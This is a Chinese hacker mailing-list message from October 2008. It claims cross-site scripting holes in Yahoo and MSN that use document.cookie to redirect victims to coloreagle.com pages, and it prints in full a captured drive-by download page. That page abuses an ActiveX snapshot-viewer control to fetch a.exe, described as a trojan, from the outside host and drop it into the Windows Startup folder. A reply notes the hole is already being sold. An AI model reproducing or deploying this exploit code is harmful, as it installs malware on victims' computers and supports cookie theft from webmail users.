恩 是有 。20日 已经有人在 www.hackertask.com 叫卖了。
--- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>写道:

> 2008-10-23
> 
> 
> 今天   好像yahoo跟MSN的跨站漏洞有被我挖掘到了
> 
> 
> 透露下一点点的小信息 跟上次的2次的 一样
> 关键部分还是有点小变化的
> 利用的document.cookie);关键语句达到跳
> 
> 
> 转目的 地址:http://www.coloreagle.com/hotmail/
> 
> 
> http://www.coloreagle.com/yahoo/
> 
> 
> 我还无意中抓到了一个网马
> 
> http://www.coloreagle.com/yahoo/ddd.html
> 
> 
> 
> 代码如下:<html>
> <object
> classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'
> id='obj'></object>
> 
> 
> 
> <script language='JavaScript'>
>       var buf1 = 'http://www.coloreagle.com/yahoo/a.exe';
>       var buf2;
>       var sysLanguage;
>       sysLanguage=navigator.systemLanguage?
> navigator.systemLanguage:navigator.language;
>       if(sysLanguage == 'en-us' || sysLanguage ==
> 'en-us'){
>               buf2="C:/Documents and Settings/All Users/Start
> Menu/Programs/
> Startup/setup.exe";
>       }
>       if(sysLanguage == 'zh-cn' || sysLanguage ==
> 'zh-CN'){
>                buf2 = "C:/Documents and Settings/All
> Users/「开始」菜单/程序/启动/
> setup.exe";
> 
>       }
>       obj.SnapshotPath = buf1;
>       obj.CompressedPath = buf2;
>       obj.PrintSnapshot();
> 
> </script>
> </html>
> 
> 
> 
> 区分中英文版本 A。EXE是个木马 呵呵,
> 
> 
> 
>  具体的细节我就不透露过多了
> 毕竟一些大牛牛还是要靠这些来吃饭的
> 
> 
> 
> 
> [EMAIL PROTECTED]
> 本人联系方式。有任何意见可以跟我交流
>
> 
> 



      ___________________________________________________________ 
 雅虎邮箱,您的终生邮箱! 
http://cn.mail.yahoo.com/

--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

回复